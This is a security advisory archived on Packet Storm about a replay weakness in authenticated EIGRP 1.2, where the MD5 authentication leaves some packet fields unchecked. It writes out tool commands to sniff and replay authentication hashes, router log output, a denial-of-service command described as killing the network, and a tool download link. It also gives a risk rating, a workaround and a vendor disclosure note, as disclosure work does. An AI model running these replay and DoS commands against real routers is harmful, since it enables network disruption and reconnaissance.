exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

eigrp12-2.txt

eigrp12-2.txt
Posted Dec 28, 2005
Site arhont.com

EIGRP version 1.2 suffers from a replay condition due to a failure of verifying the MAC.

tags | advisory
SHA-256 | c48f28c562e3d9f1f585948e20f1f77f59a7f04005ba898f4684782ffa1000f5

eigrp12-2.txt

Change Mirror Download
Arhont Ltd.- Information Security

Arhont Advisory by: Arhont Ltd
Advisory: Authenticated EIGRP DoS / Information leak
Class: design bug
Version: EIGRP version 1.2
Model Specific: Other versions might have the same bug

DETAILS:

From experiments with capturing and replaying back at the router a
variety of authenticated EIGRP packets, it appears that the MD5
algorithm is ran against the following packet fields: Opcode, AS number,
Flags, Sequence Number, Nexthop. Thus, the presence of Message
Authentication Code (MAC) does not stop attackers from replaying HELLO
packets back at the router. The only condition is needed is to sniff the
hash and throw it back at the EIGRP routers. An example of this would be

1. Sniff
arhontus# ./eigrp.pl --sniff --iface eth0
<skip>
<<<Authentication data: 0002>>>
Size: 40
Key ID: 2
MD5 key digest: efe07403446c77a9697fe5753f79e52
Key in one string (Copy & paste to replay)

00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

2. Replay
arhontus#./eigrp.pl --hello --auth
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
The packets are received well and trigger back an EIGRP update to sniff
it and find more about the network topology:
061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2
061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112
061753: 04:13:46: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
peerQ un/rely 0/1
061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr
192.168.66.112, retry 2, RTO 4500
061755: 04:13:46: AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely
0/0 peerQ un/rely 0/1 serno 3-8

As a result of it, additional information about the EIGRP domain can be
collected from the triggered UPDATE packets.

Besides, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be
ported to the authenticated EIGRP routing domain. This is done by
combining --hellodos and --auth <captured hash> flags when running the
attack using our EIGRP packet generator. The attack appears to be more
efficient, than the original attack described by FX, since the routers
recover much slower. This is possibly due to the additional overhead of
processing the authentication information. An example of the attack
command killing the network would be
arhontus#./eigrp.pl --hellodos 192.168.66.0 --auth
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
--source 192.168.66.112

Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz

Risk Factor: Medium for DoS, Low for the Information Leak

Workarounds: Extend the Message Authentication Code onto the currently
unauthenticated EIGRP packet fields.

Communication History: sent to PSIRT on 10/10/05

*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before
releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.*





Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close